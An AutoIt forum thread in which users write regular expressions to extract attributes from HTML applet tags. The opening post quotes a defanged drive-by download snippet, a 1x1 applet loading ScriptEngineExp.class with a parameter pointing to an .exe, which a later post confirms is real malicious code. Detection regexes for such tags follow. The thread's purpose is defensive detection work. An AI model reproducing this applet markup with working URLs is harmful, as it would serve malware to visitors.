DeltaRocked

Regex for applet

10 posts in this topic

hello,

I need help in generating a single regex for the following.

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

I am presently using four different regexes on the above string, starting from the applet archive attribute. I need to retrieve the URL (archive), code, width and height.

Secondly, there can be multiple applets, so I extract the text from <applet to </applet> and then execute the four regex statements on it.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)


Are the parameters always the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)


Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(\d+)".*height="(\d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)


#4 ·  Posted (edited)

deltarocked,

I am trying to get the hang of regexp, so I thought I would take a whack at this. I came up with the following:

StringRegExp($Value, 'archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"', 3)
However, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: figured out that the problem is the space delimiting the pattern, but I do NOT know how to NOT return the space as a match


In this case the 'or' | is not appropriate. You should use wildcards between the parts to be captured.

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)
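
If the alternation approach is still preferred, here is a minimal sketch of one way to avoid the blank elements. In the pattern with four separate groups, each alternative has its own group number, and groups that took no part in a given match appear to come back as empty strings. Moving the alternation onto the attribute names leaves a single capturing group. The variable names are only illustrative, and the values come back in the order they appear in the tag, not by name.

```autoit
#include <Array.au3>

; Opening applet tag taken from the first post.
Local $sTag = '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">'

; The alternation is inside a non-capturing group (?: ... ), so the only
; capturing group is the quoted value; every match fills group 1.
Local $aValues = StringRegExp($sTag, '\b(?:archive|code|width|height)="(.*?)"', 3)

; Flag 3 returns one array element per captured value across all matches.
If Not @error Then _ArrayDisplay($aValues)
```

Unlike the patterns above, this one does not depend on the order of the attributes, but it also cannot tell which value belongs to which attribute.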


Bowmore,

Thank you, I see it now!!

kylomas



#7 ·  Posted (edited)

Apologies to deltarocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly. However, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes, I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how to include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")

Also, don't leave out a question mark where one is needed. That isn't actually the case here, but it is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other terms, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? modifier (which is not the same as the ? "optional" quantifier, a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.
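
The two cases above can be checked with a short sketch like the following. The variable names are illustrative. Flag 2 is used so that the full match, not just the captured group, is available in element 0.

```autoit
Local $sSubject = 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

; Flag 2 returns the full match in element 0, followed by the captured groups.
Local $aGreedy = StringRegExp($sSubject, '(.*)abc', 2)
Local $aLazy = StringRegExp($sSubject, '(.*?)abc', 2)

; Greedy: the match runs up to the last 'abc' in the subject.
ConsoleWrite('greedy: ' & $aGreedy[0] & @CRLF)
; Lazy: the match stops at the first 'abc'.
ConsoleWrite('lazy:   ' & $aLazy[0] & @CRLF)
```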

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurrence of code=.

Otherwise you find yourself in situation 1 above (too greedy). This may in fact happen, since line breaks between HTML markup are completely unimportant and there may be none or many.



#9 ·  Posted (edited)

hello everybody,

A little bit of history about this snippet: it is actual, working drive-by download HTML code. All Java-based drive-by downloads have the same syntax, but nothing can be said about the position of the attributes or about the line feeds and spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These 3 parameters are a giveaway that this is malicious code.

Logical reasoning: a width and height of 1 (or anything less than 50) make little sense unless the intent is malicious, because these dimensions determine what the user can actually see.

ScriptEngineExp.class is a java class which executes commands. :)

The individual regexes which I have written essentially cover all the tricks used by hackers, so that each one returns an exact value irrespective of whether ", ' or no quotes are used, because any of these can appear in HTML and it is still parsed.
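
For reference, one possible way to fold the four patterns into a single regex is to use one lookahead per attribute, so that attribute order, line feeds and quote style do not matter. This is only a sketch under a few assumptions: the second applet tag in the sample is hypothetical and was added to show a different order and quoting, a tag is only reported when all four attributes are present, and a quoted value containing spaces would be cut at the first space.

```autoit
; First applet from the original post, plus a second, hypothetical applet with a
; different attribute order, single quotes and unquoted values.
Local $sHtml = '<body>' & @CRLF & _
        '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
        '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
        '</applet>' & @CRLF & _
        "<APPLET height=2 width='3' code=Other.class archive='second.jar'></APPLET>" & @CRLF & _
        '</body>'

; Each lookahead searches only inside the opening tag ([^>]*), starting right
; after "<applet", so the four attributes may appear in any order.
; \x22 is a double quote and \x27 a single quote; both are optional.
Local $sValue = '\s*=\s*[\x22\x27]?([^\x22\x27\s>]*)'
Local $sPattern = '(?i)<applet\b' & _
        '(?=[^>]*\sarchive' & $sValue & ')' & _
        '(?=[^>]*\scode' & $sValue & ')' & _
        '(?=[^>]*\swidth' & $sValue & ')' & _
        '(?=[^>]*\sheight' & $sValue & ')'

; Flag 3 returns a flat array: four captured values per matching applet tag.
Local $aHits = StringRegExp($sHtml, $sPattern, 3)
If @error Then
    ConsoleWrite('No applet tag with all four attributes found' & @CRLF)
Else
    For $i = 0 To UBound($aHits) - 1 Step 4
        ConsoleWrite('archive: ' & $aHits[$i] & @CRLF & _
                'class:   ' & $aHits[$i + 1] & @CRLF & _
                'width:   ' & $aHits[$i + 2] & @CRLF & _
                'height:  ' & $aHits[$i + 3] & @CRLF & @CRLF)
    Next
EndIf
```

Because the pattern works on the opening tag directly, it can be run over the whole page without first cutting out the text between <applet and </applet>.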

Thanks again for the efforts and the discussion.

Regards

Deltarocked


Try this one

(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*height=[\x22\x27]?\d[\x22\x27]?

I could probably shorten it down but it should work as is.
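
A minimal sketch of how the pattern above could be used as a yes/no check, assuming the tag text is already in a variable (the variable names and messages are illustrative):

```autoit
; Opening applet tag taken from the first post.
Local $sTag = '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">'

; \x22 and \x27 stand for the double and single quote, so any quoting style
; (or none) is accepted around each value.
Local $sPattern = '(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*height=[\x22\x27]?\d[\x22\x27]?'

; With the default flag (0), StringRegExp returns 1 on a match and 0 otherwise.
If StringRegExp($sTag, $sPattern) Then
    ConsoleWrite('Suspicious applet tag' & @CRLF)
Else
    ConsoleWrite('No match' & @CRLF)
EndIf
```

Note that the pattern expects code, width and height in exactly this order with only whitespace between them, and that \d matches a single digit, so a two-digit width is not flagged.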


George
